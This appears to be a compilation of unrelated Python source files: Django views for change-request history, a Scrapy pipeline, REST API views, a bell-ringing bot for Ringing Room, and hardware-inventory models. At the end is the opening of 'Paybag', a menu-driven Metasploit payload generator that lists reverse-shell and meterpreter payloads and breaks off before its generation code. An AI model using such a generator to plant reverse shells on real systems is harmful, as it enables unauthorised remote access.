raise ImproperlyConfigured('HistoryFormsetViewMixin requires formset class to be specified')
return self.formset_class(**self.get_form_kwargs())
def form_valid(self, form):
# We don't call super() here because the original form_valid() from ModelFormMixin overwrites
# self.object with output of form.save(), which is bad because form is a formset here
comment_form = self.get_comment_form()
if comment_form.is_valid():
self.object.comment = comment_form.cleaned_data['comment']
with transaction.atomic():
self.object.save_related(form)
return HttpResponseRedirect(self.get_success_url())
class HistoryDetailView(PermissionMessageMixin, DetailView):
permission_required = 'changerequest.view_changerequest'
template_name = 'history/detail.html'
model = ChangeRequest
class ListQueryStringMixin:
"""QueryString related functionality for ListViews
    ALLOWED_ORDER should be a dictionary where the keys are allowed values for
    the 'order' value in the query string and the values are the actual ORM ordering
    they are translated to. It can have a 'DEFAULT' key for the default ordering,
    which shouldn't be duplicated under another key (meaning the default ordering can
    never be selected explicitly via the query string, but that's fine because it is
    the default anyway). A short illustration of this convention is sketched at the
    end of this module.
"""
ALLOWED_ORDER = {}
def get_ordering(self):
order = self.request.GET.get('order', '').strip().lower()
if order in self.ALLOWED_ORDER:
return self.ALLOWED_ORDER[order]
# else: return default (if set)
if 'DEFAULT' in self.ALLOWED_ORDER:
return self.ALLOWED_ORDER['DEFAULT']
def build_querystring(self, page: int = None, order: str = None) -> QueryDict:
q = QueryDict(mutable=True)
# Page
if page is not None:
q['page'] = page
else:
try:
p = int(self.request.GET.get('page', 0))
if p > 0:
q['page'] = p
except ValueError:
pass
# Order
o = self.request.GET.get('order', '').lower().strip()
if order is not None:
if o == order:
q['order'] = order[1:] if order[0] == '-' else '-' + order
else: # Also inverse of '-order'
q['order'] = order
# New sort order should reset page
if 'page' in q:
del q['page']
elif o in self.ALLOWED_ORDER.keys():
q['order'] = o
return q
def get_querystring(self, *args, **kwargs) -> str:
q = self.build_querystring(*args, **kwargs)
if len(q) > 0:
return '?' + q.urlencode()
return ''
def get_order_direction(self, order: str) -> str:
# Determines current order direction (up or down) based on what -new- value of "order" will be (=opposite)
q = self.build_querystring(order=order)
if q['order'][0] == '-':
return 'up'
return 'down'
class HistoryListView(PermissionMessageMixin, ListQueryStringMixin, ListView):
permission_required = 'history.view_changerequest'
template_name = 'history/list.html'
model = ChangeRequest
paginate_by = 25
ALLOWED_ORDER = {
'DEFAULT': ['-date_modified', '-date_created'], # Also equivalent to '-date'
'date': ['date_modified', 'date_created']
}
def get_queryset(self):
qs = super().get_queryset()
qs = qs.select_related('object_type', 'related_type', 'user')
# Status
status_lookup = {v.lower(): k for k, v in ChangeRequest.Status.choices}
status = status_lookup.get(self.request.GET.get('status'), None)
if status is not None:
qs = qs.filter(status=status)
# User
user = self.request.GET.get('user', '').strip()
if user:
qs = qs.filter(user__username__icontains=user)
return qs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Status
context['status'] = 'all' # Default value
status = self.request.GET.get('status', '').lower().strip()
if status.title() in ChangeRequest.Status.labels:
context['status'] = status
return context
def get_absolute_url(self):
return reverse('history:browse')
def build_querystring(self, page: int = None, order: str = None, status: str = None) -> QueryDict:
q = super().build_querystring(page=page, order=order)
# Status
if status is not None:
# Status can be 'all' (or other non-valid value) to remove it from query string
if status.title() in ChangeRequest.Status.labels:
q['status'] = status
# New status filter should reset page
if 'page' in q:
del q['page']
else:
s = self.request.GET.get('status', '').lower().strip()
if s.title() in ChangeRequest.Status.labels:
q['status'] = s
# User
user = self.request.GET.get('user', '').strip()
if user:
q['user'] = user
return q
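# Illustrative sketch of the ALLOWED_ORDER convention documented in ListQueryStringMixin,
# using HistoryListView's mapping above (the example requests are assumptions, not taken
# from the original project):
#
#   ?order=date        -> get_ordering() returns ['date_modified', 'date_created']
#   no / unknown order -> the 'DEFAULT' entry, ['-date_modified', '-date_created']
#
# Calling build_querystring(order='date') while 'date' is already active flips it to
# '-date' and drops the page number; '-date' is not a key in ALLOWED_ORDER, so ordering
# falls back to DEFAULT, which (as noted above) is equivalent to the descending sort.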
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from lxml import etree
class LinkscrapyPipeline:
def open_spider(self, spider):
self.root = etree.Element('data')
def close_spider(self, spider):
str_data = etree.tostring(self.root, encoding="UTF-8", pretty_print=True, xml_declaration=True)
with open(spider.name + '.xml', 'wb') as f:
f.write(str_data)
def process_item(self, item, spider):
elem = None
if spider.name == 'hotline':
elem = etree.Element('product')
elem.append(etree.Element('description', text=item['description']))
elem.append(etree.Element('price', text=item['price']))
elem.append(etree.Element('image', text=item['image']))
else:
elem = etree.Element('page', url=item['url'])
for payload in item["payload"]:
fragment = etree.Element('fragment', type=payload['type'], text=payload['data'])
elem.append(fragment)
self.root.append(elem)
return item
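# Note on the elements built above (an observation, not a behavioural change): lxml
# treats keyword arguments to etree.Element() as XML *attributes*, so for example
# etree.Element('price', text=item['price']) serializes as <price text="..."/> rather
# than <price>...</price>. A minimal sketch of the difference:
#
#   from lxml import etree
#   e = etree.Element('price', text='10')
#   etree.tostring(e)      # b'<price text="10"/>'
#   e = etree.Element('price')
#   e.text = '10'
#   etree.tostring(e)      # b'<price>10</price>'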
|
from rest_framework.generics import (
ListAPIView,
RetrieveAPIView,
DestroyAPIView,
UpdateAPIView
)
from debate.models import DebateTopic
from debate.api.serializers import DebateTopicSerializer
class DebateTopicListAPIView(ListAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicDetailAPIView(RetrieveAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicEditAPIView(UpdateAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicDeleteAPIView(DestroyAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
|
"""
Module to contain the Bot class, which acts as 'glue' to combine the rhythm, row generation and
SocketIO communication provided by the Rhythm, RowGenerator and Tower objects into a useful program.
"""
import time
import logging
import threading
from typing import Optional, Any, List
from wheatley import calls
from wheatley.aliases import JSON, Row
from wheatley.stroke import Stroke
from wheatley.bell import Bell
from wheatley.rhythm import Rhythm
from wheatley.row_generation.helpers import generate_starting_row, rounds
from wheatley.tower import RingingRoomTower
from wheatley.parsing import to_bool, json_to_row_generator, RowGenParseError
from wheatley.row_generation import RowGenerator
# Number of seconds that Wheatley is not ringing before Wheatley will return from the mainloop
# Only applies when Wheatley is running in server mode
INACTIVITY_EXIT_TIME = 300
# How long it takes Bryn to say 'Look To'. This is the length of time that Wheatley will wait
# between receiving the 'Look To' signal and when the first stroke is expected
LOOK_TO_DURATION = 3.0 # seconds
# Bot holds a lot of state, allow it to have more fields
# pylint: disable=too-many-instance-attributes
class Bot:
"""
    A class to hold all the information that Wheatley uses to glue the rhythm,
    row_gen and socket-io parts together into a useful program.
"""
logger_name = "BOT"
def __init__(
self,
tower: RingingRoomTower,
row_generator: RowGenerator,
do_up_down_in: bool,
stop_at_rounds: bool,
call_comps: bool,
rhythm: Rhythm,
user_name: Optional[str] = None,
server_instance_id: Optional[int] = None,
) -> None:
"""Initialise a Bot with all the parts it needs to run."""
# If this is None then Wheatley is in client mode, otherwise Wheatley is in server mode
self._server_instance_id = server_instance_id
self._last_activity_time = time.time()
self._rhythm = rhythm
self._do_up_down_in = do_up_down_in
self._stop_at_rounds = stop_at_rounds
self._call_comps = call_comps
self._user_name = user_name
self.row_generator = row_generator
# This is the row generator that will be used after 'Look to' is called for the next time,
# allowing for changing the method or composition whilst Wheatley is running. A mutex lock
# is required to prevent the following race condition:
# - The tower size is reduced, and a `s_size_change` signal is sent. This causes
# `self._check_number_of_bells` to be called on `self.next_row_generator`. This checks
# whether or not the stage is too large to fit in the current tower. Suppose that this
# check passes.
# - Between the check and the body of the `if` statement, a new row generator arrives in the
# `s_wheatley_row_gen` signal. This has the new stage, and gets assigned to
# `self.next_row_generator`
# - The `s_size_change` thread continues executing, and sets `self.next_row_generator` to
# `None`, thus overwriting the **new** row generator (which was perfectly fine).
self.next_row_generator_lock = threading.Lock()
self.next_row_generator: Optional[RowGenerator] = None
self._tower = tower
self._tower.invoke_on_call[calls.LOOK_TO].append(self._on_look_to)
self._tower.invoke_on_call[calls.GO].append(self._on_go)
self._tower.invoke_on_call[calls.BOB].append(self._on_bob)
self._tower.invoke_on_call[calls.SINGLE].append(self._on_single)
self._tower.invoke_on_call[calls.THATS_ALL].append(self._on_thats_all)
self._tower.invoke_on_call[calls.ROUNDS].append(self._on_rounds)
self._tower.invoke_on_call[calls.STAND].append(self._on_stand_next)
self._tower.invoke_on_bell_rung.append(self._on_bell_ring)
self._tower.invoke_on_reset.append(self._on_size_change)
if self._server_mode:
self._tower.invoke_on_setting_change.append(self._on_setting_change)
self._tower.invoke_on_row_gen_change.append(self._on_row_gen_change)
self._tower.invoke_on_stop_touch.append(self._on_stop_touch)
self._is_ringing = False
self._is_ringing_rounds = False
self._is_ringing_opening_row = True
# This is used as a counter - once `Go` or `Look To` is received, the number of rounds left
# is calculated and then decremented at the start of every subsequent row until it reaches
# 0, at which point the method starts. We keep a counter rather than a simple flag so that
# calls can be called **before** going into changes when Wheatley is calling (useful for
# calling the first method name in spliced and early calls in Original, Erin, etc.). The
# value `None` is used to represent the case where we don't know when we will be starting
        # the method (and therefore it makes no sense to decrement this counter).
self._rounds_left_before_method: Optional[int] = None
self._rows_left_before_rounds: Optional[int] = None
self._should_stand = False
self._row_number = 0
self._place = 0
self._opening_row: Row = row_generator.start_row
self._rounds: Row = rounds(self.number_of_bells)
self._row: Row = self._rounds
# This is used because the row's calls are generated at the **end** of each row (or on
# `Look To`), but need to be called at the **start** of the next row.
self._calls: List[str] = []
self.logger = logging.getLogger(self.logger_name)
# Log what we're going to ring, and how to stop Wheatley
self.logger.info(f"Wheatley will ring {self.row_generator.summary_string()}")
self.logger.info("Press `Control-C` to stop Wheatley ringing, e.g. to change method.")
# Convenient properties that are frequently used
@property
def stroke(self) -> Stroke:
"""Returns true if the current row (determined by self._row_number) represents a handstroke."""
return Stroke.from_index(self._row_number)
@property
def number_of_bells(self) -> int:
"""Convenient property to find the number of bells in the current tower."""
return self._tower.number_of_bells
@property
def _server_mode(self) -> bool:
return self._server_instance_id is not None
# Callbacks
def _on_setting_change(self, key: str, value: Any) -> None:
def log_invalid_key(message: str) -> None:
self.logger.warning(f"Invalid value for {key}: {message}")
if key == "use_up_down_in":
try:
self._do_up_down_in = to_bool(value)
self.logger.info(f"Setting 'use_up_down_in' to {self._do_up_down_in}")
except ValueError:
log_invalid_key(f"{value} cannot be converted into a bool")
elif key == "stop_at_rounds":
try:
self._stop_at_rounds = to_bool(value)
self.logger.info(f"Setting 'stop_at_rounds' to {value}")
except ValueError:
log_invalid_key(f"{value} cannot be converted into a bool")
else:
self._rhythm.change_setting(key, value, time.time())
def _on_row_gen_change(self, row_gen_json: JSON) -> None:
try:
# We need a mutex lock on `self.next_row_generator` to prevent a possible race
# conditions when reducing the tower size (see the definition of
# `self.next_row_generator` in `__init__` for more details)
with self.next_row_generator_lock:
self.next_row_generator = json_to_row_generator(row_gen_json, self.logger)
self.logger.info(f"Next touch, Wheatley will ring {self.next_row_generator.summary_string()}")
except RowGenParseError as e:
self.logger.warning(e)
def _on_size_change(self) -> None:
self._check_number_of_bells()
self._opening_row = generate_starting_row(self.number_of_bells, self.row_generator.custom_start_row)
self._rounds = rounds(self.number_of_bells)
self._check_starting_row() # Check that the current row gen is OK (otherwise warn the user)
# Check that `self.next_row_generator` has the right stage
with self.next_row_generator_lock:
if self.next_row_generator is not None and not self._check_number_of_bells(
self.next_row_generator, silent=True
):
self.logger.warning("Next row gen needed too many bells, so is being removed.")
# If the `next_row_generator` can't be rung on the new stage, then remove it.
self.next_row_generator = None
def _check_starting_row(self) -> bool:
if (
self.row_generator.custom_start_row is not None
and len(self.row_generator.custom_start_row) < self.number_of_bells
):
self.logger.info(
f"The starting row '{self.row_generator.custom_start_row}' "
+ f"contains fewer bells than the tower ({self.number_of_bells}). "
+ "Wheatley will add the extra bells to the end of the change."
)
if len(self._opening_row) != self.number_of_bells:
self.logger.warning(
f"The current tower has fewer bells ({self.number_of_bells}) "
+ f"than the starting row {self._opening_row}. Wheatley will not ring!"
)
return False
return True
def _check_number_of_bells(self, row_gen: Optional[RowGenerator] = None, silent: bool = False) -> bool:
"""Returns whether Wheatley can ring with the current number of bells with reasons why not"""
# If the user doesn't pass the `row_gen` argument, then default to `self.row_generator`
row_gen = row_gen or self.row_generator
if row_gen.stage == 0:
self.logger.debug("Place holder row generator. Wheatley will not ring!")
return False
if self._tower.number_of_bells < row_gen.stage:
if not silent: # only log if `silent` isn't set
self.logger.warning(
f"Row generation requires at least {row_gen.stage} bells, "
+ f"but the current tower has {self.number_of_bells}. "
+ "Wheatley will not ring!"
)
return False
if self._tower.number_of_bells > row_gen.stage + 1 and row_gen.custom_start_row is None:
if row_gen.stage % 2:
expected = row_gen.stage + 1
else:
expected = row_gen.stage
if not silent: # only log if `silent` isn't set
self.logger.info(
f"Current tower has more bells ({self.number_of_bells}) than expected "
+ f"({expected}). Wheatley will add extra cover bells."
)
return True
def _on_look_to(self) -> None:
if self._check_starting_row() and self._check_number_of_bells():
self.look_to_has_been_called(time.time())
# This is public because it's used by `wheatley.main.server_main`. `server_main` calls it
# because, when running Wheatley on the RR servers, it is entirely possible that a new Wheatley
# process is invoked a few seconds **after** 'Look To' has been called. This does not
# necessarily make Wheatley start late (because Bryn takes ~3 seconds to say 'Look To'), but the
# new Wheatley instance needs to know _when_ 'Look To' was called (otherwise the new instance
# doesn't know when to start ringing). To achieve this, the RR server remembers the timestamp
# of `Look To` and passes it to the new instance through the `--look-to-time` argument (defined
# in `server_main`). The main function then creates the `Bot` singleton and immediately calls
# `look_to_has_been_called`, forwarding the `--look-to-time` as the argument.
#
# **side note**: system clocks on different computers are really rarely in sync, so it's
# generally a very bad idea to pass timestamps between two processes, in case they end up
# running on different machines. However, in our case, the only time `--look-to-time` is used
# is when Wheatley is running on the same machine as the RR server itself. So (in this case) we
# are fine.
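# As a minimal sketch only (not the real `server_main` code), the forwarding described
# above might look like this, assuming a hypothetical argparse flag `--look-to-time`:
#
#     parser.add_argument("--look-to-time", type=float, default=None)
#     args = parser.parse_args()
#     bot = Bot(...)  # construction arguments elided
#     if args.look_to_time is not None:
#         bot.look_to_has_been_called(args.look_to_time)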
def look_to_has_been_called(self, call_time: float) -> None:
"""Callback called when a user calls 'Look To'."""
self._rhythm.return_to_mainloop()
treble = self._rounds[0]
# Count number of user controlled bells
number_of_user_controlled_bells = sum(1 for bell in self._rounds if self._user_assigned_bell(bell))
self._rhythm.initialise_line(
self.number_of_bells,
self._user_assigned_bell(treble),
call_time + LOOK_TO_DURATION,
number_of_user_controlled_bells,
)
# Move to the next row generator if it's defined
self.row_generator = self.next_row_generator or self.row_generator
self.next_row_generator = None
# Clear all the flags and counters
self._should_stand = False
self._rows_left_before_rounds = None
# Set _rounds_left_before_method if we are ringing up-down-in (3 rounds for backstroke
# start; 2 for handstroke)
if not self._do_up_down_in:
self._rounds_left_before_method = None
elif self.row_generator.start_stroke().is_hand():
self._rounds_left_before_method = 2
else:
self._rounds_left_before_method = 3
# Reset the state, so that Wheatley starts by ringing rounds
self._is_ringing = True
self._is_ringing_rounds = True
self._is_ringing_opening_row = True
# Start at the first place of the first row
self.start_next_row(is_first_row=True)
def _on_go(self) -> None:
"""Callback called when a user calls 'Go'."""
if self._is_ringing_rounds or self._is_ringing_opening_row:
# Calculate how many more rows of rounds we should ring before going into changes (1 if
# the person called 'Go' on the same stroke as the RowGenerator starts, otherwise 0).
# These values are one less than expected because we are setting
# _rounds_left_before_method **after** the row has started.
self._rounds_left_before_method = 1 if self.stroke == self.row_generator.start_stroke() else 0
# Make sure to call all of the calls that we have missed in the right order (in case the
# person calling `Go` called it stupidly late)
early_calls = [
(ind, calls)
for (ind, calls) in self.row_generator.early_calls().items()
if ind > self._rounds_left_before_method
]
# Sort early calls by the number of rows **before** the method start. Note that we are
# sorting by a quantity that counts **down** with time, hence the reversed sort.
early_calls.sort(key=lambda x: x[0], reverse=True)
# In this case, we don't want to wait until the next row before making these calls
# because the rows on which these calls should have been called have already passed.
# Therefore, we simply get them out as quickly as possible so they have the best chance
# of being heard.
for (_, c) in early_calls:
self._make_calls(c)
def _on_bob(self) -> None:
"""Callback called when a user calls 'Bob'."""
self.row_generator.set_bob()
def _on_single(self) -> None:
"""Callback called when a user calls 'Single'."""
self.row_generator.set_single()
def _on_thats_all(self) -> None:
"""Callback called when a user calls 'That`s All'."""
# We set this to one, because we expect one clear row between the call and rounds
self._rows_left_before_rounds = 1
def _on_rounds(self) -> None:
"""Callback called when a user calls 'Rounds'."""
# We set this to one, because we expect one clear row between the call and rounds
self._is_ringing_opening_row = True
def _on_stand_next(self) -> None:
"""Callback called when a user calls 'Stand Next'."""
self._should_stand = True
def _on_bell_ring(self, bell: Bell, stroke: Stroke) -> None:
"""Callback called when the Tower receives a signal that a bell has been rung."""
if self._user_assigned_bell(bell):
# This will give us the stroke _after_ the bell rings, we have to invert it, because
# otherwise this will always expect the bells on the wrong stroke and no ringing will
# ever happen
self._rhythm.on_bell_ring(bell, stroke.opposite(), time.time())
def _on_stop_touch(self) -> None:
self.logger.info("Got to callback for stop touch")
self._tower.set_is_ringing(False)
self._is_ringing = False
self._rhythm.return_to_mainloop()
# Mainloop and helper methods
def expect_bell(self, index: int, bell: Bell) -> None:
"""Called to let the rhythm expect a user-controlled bell at a certain time and stroke."""
if self._user_assigned_bell(bell):
self._rhythm.expect_bell(bell, self._row_number, index, self.stroke)
def generate_next_row(self) -> None:
"""Creates a new row from the row generator and tells the rhythm to expect the new bells."""
if self._is_ringing_opening_row:
self._row = self._opening_row
elif self._is_ringing_rounds:
self._row = self._rounds
else:
self._row, self._calls = self.row_generator.next_row_and_calls(self.stroke)
# Add cover bells if needed
if len(self._row) < len(self._opening_row):
self._row = Row(self._row + self._opening_row[len(self._row) :])
bells = " ".join([str(bell) for bell in self._row])
self.logger.info(f"ROW: {bells}")
def start_next_row(self, is_first_row: bool) -> None:
"""Updates state of bot ready to ring the next row / stop ringing"""
# Generate the next row and update row indices
self._place = 0
if is_first_row:
self._row_number = 0
else:
self._row_number += 1
# Useful local variables
has_just_rung_rounds = self._row == self._rounds
next_stroke = Stroke.from_index(self._row_number)
# Implement handbell-style stopping at rounds
if self._stop_at_rounds and has_just_rung_rounds and not self._is_ringing_opening_row:
self._should_stand = True
# Set any early calls specified by the row generator to be called at the start of the next
# row
if self._rounds_left_before_method is not None:
self._calls = self.row_generator.early_calls().get(self._rounds_left_before_method) or []
# Start the method if necessary
if self._rounds_left_before_method == 0:
# Sanity check that we are in fact starting on the correct stroke (which is no longer
# trivially guaranteed since we use a counter rather than a flag to determine when to
# start the method)
assert next_stroke == self.row_generator.start_stroke()
self._rounds_left_before_method = None
self._is_ringing_rounds = False
self._is_ringing_opening_row = False
# If the tower size somehow changed, then call 'Stand' but keep ringing rounds (Wheatley
# calling 'Stand' will still generate a callback to `self._on_stand_next`, so we don't
# need to handle that here)
if not self._check_number_of_bells():
self._make_call("Stand")
self._is_ringing_rounds = True
self.row_generator.reset()
if self._rounds_left_before_method is not None:
self._rounds_left_before_method -= 1
# If we're starting a handstroke ...
if next_stroke.is_hand():
# ... and 'Stand' has been called, then stand
if self._should_stand:
self._should_stand = False
self._is_ringing = False
# There are two cases for coming round:
# 1. Someone calls 'That's All' and rounds appears
# (or)
# 2. Someone calls 'That's All', one clear row has elapsed
if self._rows_left_before_rounds == 0 or (
has_just_rung_rounds and self._rows_left_before_rounds is not None
):
self._rows_left_before_rounds = None
self._is_ringing_rounds = True
if self._rows_left_before_rounds is not None:
self._rows_left_before_rounds -= 1
# If we've set `_is_ringing` to False, then no more rounds can happen so early return to
# avoid erroneous calls
if not self._is_ringing:
return
# Generate the next row, and tell the rhythm detection where the next row's bells are
# expected to ring
self.generate_next_row()
for (index, bell) in enumerate(self._row):
self.expect_bell(index, bell)
def tick(self) -> None:
"""
Move the ringing on by one place. This 'tick' function is called once every time a bell is
rung.
"""
bell = self._row[self._place]
user_controlled = self._user_assigned_bell(bell)
self._rhythm.wait_for_bell_time(
time.time(), bell, self._row_number, self._place, user_controlled, self.stroke
)
if not user_controlled:
self._tower.ring_bell(bell, self.stroke)
# If we are ringing the first bell in the row, then also make any calls that are needed.
if self._place == 0:
self._make_calls(self._calls)
# Move one place through the ringing
self._place += 1
# Start a new row if we get to a place that's bigger than the number of bells
if self._place >= self.number_of_bells:
self.start_next_row(is_first_row=False)
def main_loop(self) -> None:
"""
Wheatley's main loop. The main thread will get stuck forever in this function whilst
Wheatley rings. The outer main-loop contains two sub-loops: the first one for Wheatley
waiting to ring (triggered by `Look To`), while the second one makes Wheatley ring
by repeatedly calling `self.tick()`.
"""
while True:
# Log a message to say that Wheatley is waiting for 'Look To!'
self.logger.info("Waiting for 'Look To'...")
# Waiting to ring: Sit in an infinite loop whilst we're not ringing, and exit Wheatley
# if the tower is inactive for long enough.
self._last_activity_time = time.time()
while not self._is_ringing:
time.sleep(0.01)
if self._server_mode and time.time() > self._last_activity_time + INACTIVITY_EXIT_TIME:
self.logger.info(f"Timed out - no activity for {INACTIVITY_EXIT_TIME}s. Exiting.")
return
# Start ringing: note that this code runs **IMMEDIATELY** after `Look To` is called, but
# `self._rhythm` is told to wait until after Bryn has finished saying `Look To`.
if self._do_up_down_in:
self.logger.info(f"Starting to ring {self.row_generator.summary_string()}")
else:
self.logger.info(f"Waiting for 'Go' to ring {self.row_generator.summary_string()}...")
if self._server_mode:
self._tower.set_is_ringing(True) # Set text in Wheatley box to 'Wheatley is ringing...'
# All Wheatley instances should return a 'Roll Call' message after `Look To`, but
# **only** if they are actually able to start ringing. This prevents a problem
# where Wheatleys could get stuck in a state where they respond to the roll-call but
# are unable to ring. The RR server gets a roll-call reply, assumes everything is
# fine, and ends up creating a 'zombie' Wheatley instance. To the user, this just
# looks like Wheatley has gone off in a huff
assert self._server_instance_id is not None
self._tower.emit_roll_call(self._server_instance_id)
# Repeatedly ring until the ringing stops
while self._is_ringing:
self.tick()
# Add a tiny bit of extra delay between each stroke so that Wheatley doesn't DDoS
# Ringing Room if `self._rhythm.wait_for_bell_time()` returns immediately
time.sleep(0.01)
# Finish ringing
self.logger.info("Stopping ringing!")
if self._server_mode:
self._tower.set_is_ringing(False) # Set text in Wheatley box to 'Wheatley will ring...'
def _user_assigned_bell(self, bell: Bell) -> bool:
"""Returns `True` if this bell is not assigned to Wheatley."""
return not self._bot_assigned_bell(bell)
def _bot_assigned_bell(self, bell: Bell) -> bool:
"""Returns `True` if this bell **is** assigned to Wheatley."""
return self._tower.is_bell_assigned_to(bell, self._user_name)
def _make_calls(self, call_list: List[str]) -> None:
"""Broadcast a sequence of calls"""
for c in call_list:
self._make_call(c)
def _make_call(self, call: str) -> None:
"""Broadcast a call, unless we've been told not to call anything."""
if self._call_comps:
self._tower.make_call(call)
|
#HARDWARE_AQUISITION = BudgetLine.objects.get(id=3)
from django.contrib.auth.models import User
from django.db import models
from django.forms import fields
from django.utils.translation import ugettext_lazy as _
from what_apps.commerce.models import RealThing
from what_apps.products.models import Product, ProductBrand
import re
MAC_RE = r'^([0-9a-fA-F]{2}([:-]?|$)){6}$'
mac_re = re.compile(MAC_RE)
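# Illustrative checks of the pattern above (both colon/dash-separated and bare
# hex notations are accepted):
#
#     >>> bool(mac_re.match('00:1A:2B:3C:4D:5E'))
#     True
#     >>> bool(mac_re.match('001A2B3C4D5E'))
#     True
#     >>> bool(mac_re.match('not-a-mac'))
#     False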
class DisplayType(models.Model):
name=models.CharField(max_length=20)
class DeviceInterface(models.Model):
name=models.CharField(max_length=20)
class Purpose(models.Model):
name=models.CharField(max_length=80)
description=models.TextField()
class PrinterType(models.Model):
name=models.CharField(max_length=20)
class PurposeRationale(models.Model):
'''This model asks:
Why is a device assigned to its current purpose(s)?
'''
name=models.CharField(max_length=80)
# Here's the additional description.
description=models.TextField()
device=models.ForeignKey('Device')
purpose=models.ForeignKey('Purpose')
class DeviceModel(Product): #Ethereal
'''
The make and model of a device.
IE, "Asus GTX9000" or whatever.
This will be the "GTX9000" part.
'''
designation = models.CharField(max_length=80)
brand=models.ForeignKey(ProductBrand)
def __unicode__(self):
return self.brand.name + " " + self.name
class QuickId(models.Model):
'''
Nothing but an int field. Maybe some methods someday?
'''
id = models.CharField(max_length=10, primary_key=True)
thing = models.OneToOneField('commerce.RealThing', related_name="quick")
class Device(RealThing):
model = models.ForeignKey(DeviceModel)
purpose=models.ManyToManyField(Purpose, through='PurposeRationale', blank=True, null=True)
location=models.ForeignKey('presence.Location', blank=True, null=True)
def __unicode__(self):
return self.model.name
class NetworkDevice(Device):
ip_address=models.IPAddressField()
mac_address=models.CharField(max_length=17, blank=True, null=True)
lan_speed=models.IntegerField()
hostname=models.CharField(max_length=60)
inward_neighbour = models.ForeignKey('self', related_name="outward_neighbours", null=True, blank=True)
connected=models.BooleanField()
def list_outward_neighbors(self):
return self.outward_neighbours.all()
def incoming_budget_line(self):
if not self.model.incoming_budget_line:
self.model.incoming_budget_line = HARDWARE_AQUISITION
return self.model.incoming_budget_line
class ComputerFormFactor(models.Model):
name=models.CharField(max_length=30)
class Computer(NetworkDevice):
form_factor=models.ForeignKey(ComputerFormFactor)
public_use=models.BooleanField()
#we need to associate computers with components contained and peripherals attached
class WAP(NetworkDevice):
SSID=models.CharField(max_length=100)
#a,b,g, or n
broadcast=models.CharField(max_length=10)
class Peripheral(Device):
connectivity=models.ForeignKey(DeviceInterface)
class Printer(Peripheral):
type=models.ForeignKey(PrinterType)
multifunction=models.BooleanField()
class Display(Device):
type=models.ForeignKey(DisplayType)
class Component(Device):
connectivity=models.ManyToManyField(DeviceInterface)
class RAM(Component):
#DDR, SDRAM, DRAM Etc.
type=models.CharField(max_length=200)
size=models.IntegerField() #should be followed with a unit of measurement
class HDD(Component):
capacity=models.IntegerField() #should be followed with a unit of measurement
class PowerSupply(Component):
max_output=models.IntegerField()
power_connectivity=models.ForeignKey(DeviceInterface)
class PowerAdapter(Device):
voltage=models.FloatField()
amperage=models.FloatField()
class CPU(Component):
FQ=models.IntegerField()#Should be followed by GHZ or MHZ
class Cable(Device):
connectivity=models.ManyToManyField(DeviceInterface)
class PowerStrip(Device):
port_value=models.IntegerField()
plug_form_factor=models.CharField(max_length=40)
|
# Paybag
# Author - D3adpool2K
# github - https://github.com/Deadpool2000
import os
import random
import sys
from prettytable import PrettyTable
import distro
try:
os.system('clear')
R='\033[91m'
Y='\033[93m'
G='\033[92m'
CY='\033[96m'
W='\033[97m'
B='\033[95m'
global osname
def start():
print(CY+"""
____ __
/ __ \____ ___ __/ /_ ____ _____ _
/ /_/ / __ `/ / / / __ \/ __ `/ __ `/
/ ____/ /_/ / /_/ / /_/ / /_/ / /_/ /
/_/ \__,_/\__, /_.___/\__,_/\__, /
/____/ /____/
"""+Y+"""
[--"""+R+""">"""+Y+""" v1.2 """+R+"""<"""+Y+"""--]"""+G+"""
>> Payload generator for Metasploit <<"""+CY+"""
---------------------------"""+B+"""
Code By -> Deadpool2000""")
def main():
print(R+"""\n************************************************"""+CY+"""\n
>>> Main menu"""+Y+"""
1) Create a payload
2) Start listener
3) Launch Metasploit
4) Exit\n""")
def osi():
print(R+"""\n
************************************************"""+Y+"""
>>> Select operating system to create payload\n"""+CY+"""
1) Android
2) Windows
3) Linux
99) Back to main menu\n""")
def lst():
print(R+"""\n
************************************************"""+Y+"""
>>> Select operating system to create listener\n"""+CY+"""
1) Android
2) Windows
3) Linux
99) Back to main menu\n""")
def payld():
print(R+"""
************************************************"""+Y+"""
>>> Select payload\n"""+CY+"""
1) windows/meterpreter/reverse_tcp
2) windows/x64/meterpreter/reverse_tcp (For 64-bit)
3) windows/vncinject/reverse_tcp
4) windows/x64/vncinject/reverse_tcp (For 64-bit)
5) windows/shell/reverse_tcp
6) windows/x64/shell/reverse_tcp (For 64-bit)
7) windows/powershell_reverse_tcp
8) windows/x64/powershell_reverse_tcp (For 64-bit)
99) Back to main menu\n""")
def linux_payload():
print(R+"""
************************************************"""+Y+"""
>>> Select payload\n"""+CY+"""
1) linux/x86/meterpreter/reverse_tcp
2) linux/x64/meterpreter/reverse_tcp (For 64-bit)
3) linux/x86/shell/reverse_tcp
4) linux/x64/shell/reverse_tcp (For 64-bit)
99) Back to main menu\n""")
def arch1():
print(CY+"""Select Architecture -"""+R+"""1)"""+Y+""" x86"""+R+""" 2)"""+Y+""" x64""")
def checkver():
if sys.version_info[0] < 3:
print(Y+"Use Python 3 to run this script"+R+"!"+W)
exit(0)
def install():
print(Y+"\nInstalling Metasploit-framework...\n"+W)
premsf=['kali','parrot']
deb=['ubuntu','debian']
did=distro.like()
did2=distro.id()
print(did)
if did in deb:
if did in premsf:
os.system("sudo apt-get upodate && sudo apt-get install metasploit-framework")
else:
os.system("sudo apt-get install -y build-essential zlib1g zlib1g-dev libpq-dev libpcap-dev libsqlite3-dev ruby ruby-dev")
os.system("cd $HOME && git clone https://github.com/rapid7/metasploit-framework.git")
os.system("cd $HOME/metasploit-framework && sudo gem install bundler && bundle install")
os.system("sudo cp assets/msfconsole /usr/bin/ && sudo cp assets/msfvenom /usr/bin/ && sudo cp assets/msfupdate /usr/bin/")
os.system("clear")
elif(did==""):
print(Y+"\nOther distro detected ! Please install metasploit manually.\n"+W)
exit(0)
else:
print(R+"\nSomething went wrong!\n"+W)
def mk():
if os.path.exists("payload")==False:
os.system("mkdir payload")
def check():
try:
os.remove('msh.rc')
except FileNotFoundError:
print()
pth="/data/data/com.termux/files/usr/bin/bash"
def check2():
